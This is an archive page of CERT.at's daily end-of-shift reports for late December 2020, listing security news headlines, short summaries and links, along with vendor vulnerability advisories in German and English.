- Daily - CERT.at

Tageszusammenfassung - 28.12.2020
by Daily end-of-shift report 28 Dec '20

28 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 23-12-2020 18:00 − Montag 28-12-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Jahresrückblick 2020: Diese Themen beschäftigten uns heuer! ∗∗∗ --------------------------------------------- Die Corona-Krise hat 2020 die ganze Welt in Atem gehalten. Auch bei der Watchlist Internet blieb die Corona-Krise nicht unbemerkt. Kriminelle nutzten die globale Gesundheitskrise für verschiedene Betrugsmaschen – von Fake-Shops, die Atemschutzmasken in ihr Angebot aufnahmen, über betrügerische Jobangebote bis hin zu Phishing-Nachrichten. Ebenfalls mit verschiedenen Betrugsmaschen in Verbindung steht der wachsende Trend von unseriöser Werbung. Fake-Shops werden dabei [...] --------------------------------------------- https://www.watchlist-internet.at/news/jahresrueckblick-2020-diese-themen-b… ∗∗∗ Amazon-Geschenkkarte mit Banking-Trojaner Dridex ∗∗∗ --------------------------------------------- Ein unwillkommenes Mitbringsel präsentiert eine angebliche Amazon-Geschenkkarte. Unaufmerksame Verbraucher werden mit dem Banking-Trojaner Dridex bestohlen. --------------------------------------------- https://www.zdnet.de/88391026/amazon-geschenkkarte-mit-banking-trojaner-dri… ∗∗∗ Hacker missbrauchen Citrix-Geräte für DDoS-Attacken ∗∗∗ --------------------------------------------- Bedrohungsakteure haben eine Möglichkeit entdeckt, Junk-Web-Traffic gegen Citrix ADC-Netzwerkgeräte zu verstärken, um Distributed Denial of Service (DDoS)-Angriffe zu starten. --------------------------------------------- https://www.zdnet.de/88391041/hacker-missbrauchen-citrix-geraete-fuer-ddos-… ∗∗∗ DevOps und Security im Einklang ∗∗∗ --------------------------------------------- DevOps-Teams sehen Sicherheit oft als Innovationsbremse. Wir geben einige Tipps, wie Sie effektive Entwicklerarbeit und Security unter einen Hut bringen. --------------------------------------------- https://www.zdnet.de/88391052/devops-und-security-im-einklang/ ∗∗∗ CrowdStrike releases free Azure security tool after failed hack ∗∗∗ --------------------------------------------- Leading cybersecurity firm CrowdStrike was notified by Microsoft that threat actors had attempted to read the companys emails through compromised by Microsoft Azure credentials. --------------------------------------------- https://www.bleepingcomputer.com/news/security/crowdstrike-releases-free-az… ∗∗∗ GitHub-hosted malware calculates Cobalt Strike payload from Imgur pic ∗∗∗ --------------------------------------------- A new strand of malware uses Word files with macros to download a PowerShell script from GitHub. This PowerShell script further downloads a legitimate image file from image hosting service Imgur to decode a Cobalt Strike script. --------------------------------------------- https://www.bleepingcomputer.com/news/security/github-hosted-malware-calcul… ∗∗∗ Multi-platform card skimmer found on Shopify, BigCommerce stores ∗∗∗ --------------------------------------------- A recently discovered multi-platform credit card skimmer can harvest payment info on compromised stores powered by Shopify, BigCommerce, Zencart, and Woocommerce. --------------------------------------------- https://www.bleepingcomputer.com/news/security/multi-platform-card-skimmer-… ∗∗∗ Third-Party APIs: How to Prevent Enumeration Attacks ∗∗∗ --------------------------------------------- Jason Kent, hacker-in-residence at Cequence, walks through online-retail card fraud and what to do about it. --------------------------------------------- https://threatpost.com/third-party-apis-enumeration-attacks/162589/ ∗∗∗ Analysis Dridex Dropper, IoC extraction (guest diary), (Wed, Dec 23rd) ∗∗∗ --------------------------------------------- A couple of weeks ago, I assisted Xavier when he taught FOR610 in (virtual) Frankfurt. Last week, one of our students (Nicklas Keijser) sent us this analysis that we decided to share as a guest diary. --------------------------------------------- https://isc.sans.edu/diary/rss/26920 ∗∗∗ CISA Releases Free Detection Tool for Azure/M365 Environment ∗∗∗ --------------------------------------------- CISA has created a free tool for detecting unusual and potentially malicious activity that threatens users and applications in an Azure/Microsoft O365 environment. The tool is intended for use by incident responders and is narrowly focused on activity that is endemic to the recent identity- and authentication-based attacks seen in multiple sectors. --------------------------------------------- https://us-cert.cisa.gov/ncas/current-activity/2020/12/24/cisa-releases-fre… ∗∗∗ The History of DNS Vulnerabilities and the Cloud ∗∗∗ --------------------------------------------- We review the history of DNS vulnerabilities, particularly DNS cache poisoning, examining both past vulnerabilities and more advanced attacks. --------------------------------------------- https://unit42.paloaltonetworks.com/dns-vulnerabilities/ ===================== = Vulnerabilities = ===================== ∗∗∗ Project Zero: Schlecht gepatchte Windows-Lücke weiter ausnutzbar ∗∗∗ --------------------------------------------- Eine aktiv ausgenutzte Sicherheitslücke in Windows ist trotz Hinweisen von Google und einem unzureichenden Patch immer noch nicht behoben. --------------------------------------------- https://www.golem.de/news/project-zero-schlecht-gepatchte-windows-luecke-we… ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (spip and sympa), Gentoo (c-ares, cherokee, curl, dbus, firefox, gdk-pixbuf, haproxy, libass, nss, openssl, pdns, pdns-recursor, php, samba, tomcat, and webkit-gtk), and SUSE (java-1_8_0-ibm, openexr, and python3). --------------------------------------------- https://lwn.net/Articles/841225/ ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (xen) and SUSE (flac and openexr). --------------------------------------------- https://lwn.net/Articles/841243/ ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (horizon, kitty, python-apt, and roundcube), Fedora (libmaxminddb, mediawiki, mingw-binutils, and thunderbird), Mageia (erlang-rebar3), openSUSE (blosc, ceph, firefox, flac, kdeconnect-kde, openexr, ovmf, PackageKit, python3, thunderbird, and xen), and SUSE (thunderbird). --------------------------------------------- https://lwn.net/Articles/841378/ ∗∗∗ VU#429301: Veritas Backup Exec is vulnerable to privilege escalation due to OPENSSLDIR location ∗∗∗ --------------------------------------------- https://kb.cert.org/vuls/id/429301 ∗∗∗ VU#843464: SolarWinds Orion API authentication bypass allows remote command execution ∗∗∗ --------------------------------------------- https://kb.cert.org/vuls/id/843464 ∗∗∗ Security Bulletin: IBM MQ is affected by a vulnerability in Eclipse Jetty (CVE-2019-17638) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-is-affected-by-a-v… ∗∗∗ Security Bulletin: tzdata has been updated to tzdata-2020d to address Fiji and Palestine time zone changes ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-tzdata-has-been-updated-t… ∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Samba affects IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Linux kernel and TMM vulnerability CVE-2020-25705 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K09604370 ∗∗∗ Linux kernel vulnerability CVE-2018-10675 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K40540405 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 23.12.2020
by Daily end-of-shift report 23 Dec '20

23 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 22-12-2020 18:00 − Mittwoch 23-12-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Emotet Returns to Hit 100K Mailboxes Per Day ∗∗∗ --------------------------------------------- Just in time for the Christmas holiday, Emotet is sending the gift of Trickbot. --------------------------------------------- https://threatpost.com/emotet-returns-100k-mailboxes/162584/ ∗∗∗ Sicherheitsalbtraum: Viele vernetzte Türklingeln lassen Hacker ins Haus ∗∗∗ --------------------------------------------- Günstige digitale Videoklingeln weisen schwere Sicherheitslücken wie Authentifizierungsprobleme auf und werden teils schon mit Softwarefehlern geliefert. --------------------------------------------- https://heise.de/-4998372 ∗∗∗ Millions of Devices Affected by Vulnerabilities Used in Stolen FireEye Tools ∗∗∗ --------------------------------------------- Millions of devices are exposed to potential attacks exploiting the vulnerabilities used in the tools that threat actors recently stole from FireEye, security and compliance solutions provider Qualys reported on Tuesday. --------------------------------------------- https://www.securityweek.com/millions-devices-affected-vulnerabilities-used… ∗∗∗ Video: So erkennen Sie betrügerische Notdienste! ∗∗∗ --------------------------------------------- Bei einem Wasserrohrbruch, einem Gasgebrechen oder bei einem Stromausfall, muss es meist schnell gehen. Für die Überprüfung eines Installations- oder Elektrik-Notdienstes bleibt da oft keine Zeit mehr. Das nützen BetrügerInnen aus: Sie bieten online einen Notdienst an, kommen auch tatsächlich, aber stellen viel zu überhöhte Kosten in Rechnung und der Schaden wird oftmals nur oberflächlich behoben. --------------------------------------------- https://www.watchlist-internet.at/news/video-so-erkennen-sie-betruegerische… ∗∗∗ Trendthema BEC-Attacken und COVID-19-Scamming ∗∗∗ --------------------------------------------- Spear-Phishing, Business Email Compromise (BEC) oder Cyberbetrug im Zusammenhang mit COVID-19 sind Beispiele, wie sich Angreifer schnell an aktuelle Ereignisse anpassen und neue Tricks anwenden, um Angriffe erfolgreich auszuführen, wie der Spear-Phishing-Report 2020 von Barracuda zeigt. --------------------------------------------- https://www.zdnet.de/88391006/trendthema-bec-attacken-und-covid-19-scamming/ ∗∗∗ Hentai Oniichan Ransomware ∗∗∗ --------------------------------------------- VMRay has published a blog detailing a ransomware package called Hentai Oniichan. Two variants of this family, King Engine and Beserker, were observed in the wild during their investigation. --------------------------------------------- https://exchange.xforce.ibmcloud.com/collection/1b1c396cce25259b8bc5e806b35… ===================== = Vulnerabilities = ===================== ∗∗∗ QNAP fixes high severity QTS, QES, and QuTS hero vulnerabilities ∗∗∗ --------------------------------------------- QNAP has released security updates to fix multiple high severity security vulnerabilities impacting network-attached storage (NAS) devices running the QES, QTS, and QuTS hero operating systems. --------------------------------------------- https://www.bleepingcomputer.com/news/security/qnap-fixes-high-severity-qts… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (awstats and mediawiki), Fedora (mbedtls and pngcheck), openSUSE (firefox and thunderbird), Oracle (gnutls, go-toolset:ol8, pacemaker, postgresql:10, postgresql:12, and postgresql:9.6), and SUSE (clamav, groovy, jetty-minimal, and xen). --------------------------------------------- https://lwn.net/Articles/841163/ ∗∗∗ Security Advisory - Memory Leak Vulnerability in Huawei CloudEngine Product ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20201223-… ∗∗∗ Security Bulletin: Multiple Vulnerabilities in Websphere Liberty server (WLP) affects IBM Cloud Application Business Insights ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: IBM® Db2® is vulnerable to a Denial of Service on Windows (CVE-2020-4642) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-db2-is-vulnerable-to-… ∗∗∗ Security Bulletin: Multiple Vulnerabilities in IBM SDK, Java affects IBM Cloud Application Business Insights ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ cURL vulnerability CVE-2019-5482 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K41523201 ∗∗∗ Asterisk: Mehrere Schwachstellen ermöglichen Denial of Service ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1259 ∗∗∗ QNAP NAS: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1261 ∗∗∗ Grafana: Mehrere Schwachstellen ermöglichen Umgehen von Sicherheitsvorkehrungen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1260 ∗∗∗ Joomla: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1256 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 22.12.2020
by Daily end-of-shift report 22 Dec '20

22 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Montag 21-12-2020 18:00 − Dienstag 22-12-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Ransomware Task Force gegründet ∗∗∗ --------------------------------------------- Verschiedene Sicherheitsspezialisten haben die Ransomware Taks Force aus der Taufe gehoben. Zu den Gründungsmitgliedern gehören bekannte Namen wie Microsoft, McAfee und Citrix, aber auch kleinere Hersteller und gemeinnützige Organisationen. --------------------------------------------- https://www.zdnet.de/88390942/ransomware-task-force-gegruendet/ ∗∗∗ Least Privilege Application Management - A Lesson Learned from SolarWinds Orion ∗∗∗ --------------------------------------------- The sophisticated, nation-state assault used to infiltrate SolarWinds Orion and then leveraged to compromise potentially thousands of its customers is astonishing in scope and potential fallout. --------------------------------------------- https://www.beyondtrust.com/blog/entry/least-privilege-application-manageme… ∗∗∗ Smart Doorbell Disaster: Many Brands Vulnerable to Attack ∗∗∗ --------------------------------------------- Investigation reveals device sector is problem plagued when it comes to security bugs. --------------------------------------------- https://threatpost.com/smart-doorbell-vulnerable-to-attack/162527/ ∗∗∗ Patrick Wardle on Hackers Leveraging 'Powerful' iOS Bugs in High-Level Attacks ∗∗∗ --------------------------------------------- Noted Apple security expert Patrick Wardle discusses how cybercriminals are stepping up their game in targeting Apple users with new techniques and cyberattacks. --------------------------------------------- https://threatpost.com/patrick-wardle-on-hackers-leveraging-powerful-ios-bu… ∗∗∗ Threat Actors Increasingly Using VBA Purging in Attacks ∗∗∗ --------------------------------------------- Cyberattacks relying on malicious Office documents have increasingly leveraged a relatively new technique called VBA Purging, FireEye said over the weekend, when it also announced the availability of a related open source tool. --------------------------------------------- https://www.securityweek.com/threat-actors-increasingly-using-vba-purging-a… ∗∗∗ Increase in Drive-by Attacks Using SocGholish ∗∗∗ --------------------------------------------- The SocGholish framework is commonly used to distribute fake updates for applications such as Chrome, Firefox, Flash Player, and Microsoft Teams through drive-by downloads. Menlo Labs has reported an uptick in attacks using SocGholish. --------------------------------------------- https://exchange.xforce.ibmcloud.com/collection/ef2a09a8bb57d90f200a51af745… ∗∗∗ Meyhod - Yet Another Magecart Skimmer ∗∗∗ --------------------------------------------- Discovered by RiskIQ in October, Meyhod is a Magecart skimmer that researchers observed on several sites, in some cases it has been present on a site for months. The IP address that is hosting the malicious JavaScript code has several other domains associated with it that are suspected to be malicious. --------------------------------------------- https://exchange.xforce.ibmcloud.com/collection/5a493a06b3a2fa9585d3f239007… ===================== = Vulnerabilities = ===================== ∗∗∗ Sicherheitslücke mit maximaler Gefahreneinstufung in Wyse-Thin-Clients von Dell ∗∗∗ --------------------------------------------- Zwei kritische Sicherheitslücken gefährden Dell-PCs der Wyse-Thin-Serie. Updates sind verfügbar. --------------------------------------------- https://heise.de/-4997456 ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by CentOS (kernel and thunderbird), Debian (openjdk-8 and webkit2gtk), Fedora (gdm, mingw-openjpeg2, and openjpeg2), Mageia (compat-openssl10, golang-googlecode-net, mbedtls, openssl, and virtualbox), openSUSE (ovmf and xen), Red Hat (kernel, mariadb-connector-c, mariadb:10.3, postgresql:10, and postgresql:9.6), and SUSE (ardana-cassandra, ardana-mq, ardana-osconfig, ardana-tempest, crowbar-core, crowbar-openstack, grafana, influxdb, openstack-cinder, [...] --------------------------------------------- https://lwn.net/Articles/841099/ ∗∗∗ Protecting Against an Unfixed Kubernetes Man-in-the-Middle Vulnerability (CVE-2020-8554) ∗∗∗ --------------------------------------------- A currently unpatched, medium-severity issue affecting all Kubernetes versions, CVE-2020-8554 can be mitigated in several ways. --------------------------------------------- https://unit42.paloaltonetworks.com/cve-2020-8554/ ∗∗∗ BlackBerry Powered by Android Security Bulletin - December 2020 ∗∗∗ --------------------------------------------- http://support.blackberry.com/kb/articleDetail?language=en_US&articleNumber… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affect IBM Spectrum Conductor and IBM Spectrum Conductor with Spark ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: Publicly disclosed vulnerability from Bind affects IBM Netezza Host Management ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-publicly-disclosed-vulner… ∗∗∗ Security Bulletin: Apache Poi as used by IBMQRadar SIEM is vulnerable to information disclosure (CVE-2019-12415, CVE-2017-12626) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-apache-poi-as-used-by-ibm… ∗∗∗ Apache Struts vulnerability CVE-2020-17530 ∗∗∗ --------------------------------------------- https://support.f5.com/csp/article/K24608264 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 21.12.2020
by Daily end-of-shift report 21 Dec '20

21 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 18-12-2020 18:00 − Montag 21-12-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Aktuelle Welle mit Ping-Anrufen ∗∗∗ --------------------------------------------- Die Rundfunk und Telekom Regulierungs-GmbH (RTR) erhält derzeit vermehrt Meldungen zu Ping-Anrufen aus dem Ausland. Die Anrufe kommen insbesondere aus Tunesien (+216), Abchasien (+79407), der Schweiz (+41748) und Uganda (+256). Hier darf nicht zurückgerufen oder abgehoben werden, denn dies kann hohe Kosten verursachen. --------------------------------------------- https://www.watchlist-internet.at/news/aktuelle-welle-mit-ping-anrufen/ ∗∗∗ Gitpaste-12 worm botnet returns with 30+ vulnerability exploits ∗∗∗ --------------------------------------------- Recently discovered Gitpaste-12 worm that spreads via GitHub and also hosts malicious payload on Pastebin, has returned with over 30 vulnerability exploits, according to researchers at Juniper Labs. --------------------------------------------- https://www.bleepingcomputer.com/news/security/gitpaste-12-worm-botnet-retu… ∗∗∗ Hacker Dumps Crypto Wallet Customer Data; Active Attacks Follow ∗∗∗ --------------------------------------------- Customer data from a June attack against cryptocurrency wallet firm Ledger is now public and actively being used in attacks. --------------------------------------------- https://threatpost.com/ledger-dump-active-attacks-follow/162477/ ===================== = Vulnerabilities = ===================== ∗∗∗ ZDI-20-1452: (0Day) Microsoft 3D Builder GLB File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on affected installations of Microsoft 3D Builder. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1452/ ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (curl, influxdb, lxml, node-ini, php-pear, and postsrsd), Fedora (chromium, curl, firefox, matrix-synapse, mingw-jasper, phpldapadmin, and thunderbird), Mageia (openjpeg2), openSUSE (gcc7, openssh, PackageKit, python-urllib3, slurm_18_08, and webkit2gtk3), Oracle (fapolicydbug, firefox, nginx:1.16, nodejs:12, and thunderbird), Red Hat (libpq, openssl, and thunderbird), and SUSE (curl, firefox, openssh, ovmf, slurm_17_11, slurm_18_08, slurm_20_02, and [...] --------------------------------------------- https://lwn.net/Articles/840972/ ∗∗∗ Authentication Bypass Vulnerability Patched in Bouncy Castle Library ∗∗∗ --------------------------------------------- A high-severity authentication bypass vulnerability was recently addressed in the Bouncy Castle cryptography library. Founded in 2000, the project represents a collection of APIs used in cryptography for both Java and C#, with a strong emphasis on standards compliance and adaptability. --------------------------------------------- https://www.securityweek.com/authentication-bypass-vulnerability-patched-bo… ∗∗∗ Treck TCP/IP Stack ∗∗∗ --------------------------------------------- This advisory contains mitigations for Heap-based Buffer Overflow, Out-of-bounds Read, and Out-of-bounds Write vulnerabilities in Trecks TCP/IP stack, which may also be known as Kasago TCP/IP, ELMIC, Net+ OS, Quadnet, GHNET v2, Kwiknet, or AMX. --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsa-20-353-01 ∗∗∗ December 21, 2020 TNS-2020-11 [R1] Tenable.sc 5.17.0 Fixes Multiple Vulnerabilities ∗∗∗ --------------------------------------------- https://www.tenable.com/security/tns-2020-11 ∗∗∗ HCL Domino und Notes: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1254 ∗∗∗ Red Hat OpenShift: Schwachstelle ermöglicht Denial of Service und Codeausführung ∗∗∗ --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-1252 ∗∗∗ Security Bulletin: Information disclosure and Denial of Service vulnerability affect IBM Business Automation Workflow and IBM Business Process Manager (BPM) – CVE-2020-4794 ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-information-disclosure-an… ∗∗∗ Security Bulletin: Financial Transaction Manager for ACH Services is affected by a potential logout session timeout (CVE-2020-4555) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-financial-transaction-man… ∗∗∗ Security Bulletin: Financial Transaction Manager for Check Services is affected by a potential logout session timeout (CVE-2020-4555) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-financial-transaction-man… ∗∗∗ Security Bulletin: IBM MQ could allow an authenticated user, under nondefault configuration to cause a data corruption attack due to an error when using segmented messages. (CVE-2020-4592) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-could-allow-an-aut… ∗∗∗ Security Bulletin: Vulnerability in BIND affects AIX (CVE-2020-8622) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-bind-aff… ∗∗∗ Security Bulletin: Multiple vulnerabilities in the IBM Java Runtime affect IBM Rational ClearQuest ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: IBM MQ Appliance is affected by denial of service vulnerabilities (CVE-2020-5481, CVE-2020-4580, CVE-2020-4579) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-appliance-is-affec… ∗∗∗ Security Bulletin: Multiple vulnerabilities in middleware software affect IBM Cloud Pak for Automation ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-… ∗∗∗ Security Bulletin: Financial Transaction Manager for Corporate Payment Services is affected by a potential logout session timeout (CVE-2020-4555) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-financial-transaction-man… ∗∗∗ Security Bulletin: Financial Transaction Manager for Corporate Payment Services v2.1.1 is affected by a potential logout session timeout (CVE-2020-4555) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-financial-transaction-man… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 18.12.2020
by Daily end-of-shift report 18 Dec '20

18 Dec '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 17-12-2020 18:00 − Freitag 18-12-2020 18:00 Handler: Dimitri Robl Co-Handler: Robert Waldner ===================== = News = ===================== ∗∗∗ Security baseline (FINAL) for Windows 10 and Windows Server, version 20H2 ∗∗∗ --------------------------------------------- We are pleased to announce the final release of the for Windows 10 and Windows Server, version 20H2 (a.k.a. October 2020 Update) security baseline package! --------------------------------------------- https://techcommunity.microsoft.com/t5/microsoft-security-baselines/securit… ∗∗∗ A slightly optimistic tale of how patching went for CVE-2019-19781, (Fri, Dec 18th) ∗∗∗ --------------------------------------------- Since we could all probably use a little distraction from the current Solarigate/SUNBURST news, I thought it might be good to look at something a little bit more positive today. Specifically, at how patching of CVE-2019-19781 AKA "Shitrix" AKA "one of the more famous named vulnerabilities from the end of 2019" went. --------------------------------------------- https://isc.sans.edu/diary/rss/26900 ∗∗∗ E-Mails mit gefälschten Domain-Rechnungen im Umlauf ∗∗∗ --------------------------------------------- Derzeit erhalten Unternehmen E-Mails, in denen vorgegeben wird, dass sie für eine Domainregistrierung die Rechnung bezahlen müssten. Tatsächlich haben die EmpfängerInnen jedoch keinen derartigen Auftrag erteilt. Daher sollten Sie nichts bezahlten und die E-Mail ignorieren. --------------------------------------------- https://www.watchlist-internet.at/news/e-mails-mit-gefaelschten-domain-rech… ∗∗∗ SUPERNOVA: SolarStorm’s Novel .NET Webshell ∗∗∗ --------------------------------------------- The SolarStorm actors behind the supply chain attack on SolarWinds' Orion software have demonstrated a high degree of technical sophistication and attention to operational security, as well as a novel combination of techniques in the potential compromise of approximately 18,000 SolarWinds customers. As published in the original disclosure, the attackers were observed removing their initial backdoor once a more legitimate method of persistence was obtained. --------------------------------------------- https://unit42.paloaltonetworks.com/solarstorm-supernova/ ∗∗∗ Operation SignSight: Supply‑chain attack against a certification authority in Southeast Asia ∗∗∗ --------------------------------------------- ESET researchers uncovered this new supply-chain attack in early December 2020 and notified the compromised organization and the VNCERT. We believe that the website has not been delivering compromised software installers as of the end of August 2020 and ESET telemetry data does not indicate the compromised installers being distributed anywhere else. The Vietnam Government Certification Authority confirmed that they were aware of the attack before our notification and that they notified the users who downloaded the trojanized software. --------------------------------------------- https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-… ∗∗∗ Updates zu SolarWinds Orion ∗∗∗ --------------------------------------------- Die Situation um den Supply-Chain Angriff auf SolarWinds Orion Produkt ist um einige Facetten reichter geworden: --------------------------------------------- https://cert.at/de/aktuelles/2020/12/updates-zu-solarwinds-orion ===================== = Vulnerabilities = ===================== ∗∗∗ ZDI-20-1452: NETGEAR Multiple Routers mini_httpd Command Injection Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1452/ ∗∗∗ ZDI-20-1451: NETGEAR Multiple Routers mini_httpd Authentication Bypass Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-20-1451/ ∗∗∗ VMSA-2020-0029 VMware ESXi, Workstation, Fusion and Cloud Foundation updates address a denial of service vulnerability (CVE-2020-3999) ∗∗∗ --------------------------------------------- A denial of service vulnerability in VMware ESXi, Workstation and Fusion was privately reported to VMware. Updates are available to address this vulnerability in affected VMware products. --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2020-0029.html ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (blueman, chromium, gdk-pixbuf2, hostapd, lib32-gdk-pixbuf2, minidlna, nsd, pam, and unbound), CentOS (gd, openssl, pacemaker, python-rtslib, samba, and targetcli), Debian (kernel, lxml, and mediawiki), Fedora (mbedtls), openSUSE (clamav and openssl-1_0_0), Oracle (firefox and openssl), Red Hat (openssl, postgresql:12, postgresql:9.6, and thunderbird), Scientific Linux (openssl and thunderbird), and SUSE (cyrus-sasl, openssh, slurm_18_08, and webkit2gtk3). --------------------------------------------- https://lwn.net/Articles/840731/ ∗∗∗ D-LINK Router DSL-2888A: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in D-LINK Router ausnutzen, um die Authentisierung zu umgehen, seine Rechte zu erweitern, Code auszuführen oder Informationen offenzulegen. --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-1246 ∗∗∗ Security Bulletin: z/TPF is affected by an OpenSSL vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-z-tpf-is-affected-by-an-o… ∗∗∗ Security Bulletin: IBM Planning Analytics has addressed a security vulnerability (CVE-2020-4764) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-planning-analytics-ha… ∗∗∗ Security Bulletin: Version 12.18.0 of Node.js included in IBM Netcool Operations Insight 1.6.2.x has several security vulnerabilities ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-version-12-18-0-of-node-j… ∗∗∗ Emerson Rosemount X-STREAM ∗∗∗ --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsa-20-352-01 ∗∗∗ PTC Kepware KEPServerEX ∗∗∗ --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsa-20-352-02 ∗∗∗ PTC Kepware LinkMaster ∗∗∗ --------------------------------------------- https://us-cert.cisa.gov/ics/advisories/icsa-20-352-03 ∗∗∗ ctrlX Products affected by OpenSSL Vulnerability CVE-2020-1971 ∗∗∗ --------------------------------------------- https://psirt.bosch.com/security-advisories/bosch-sa-274557.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 17.12.2020
by Daily end-of-shift report 17 Dec '20

17 Dec '20

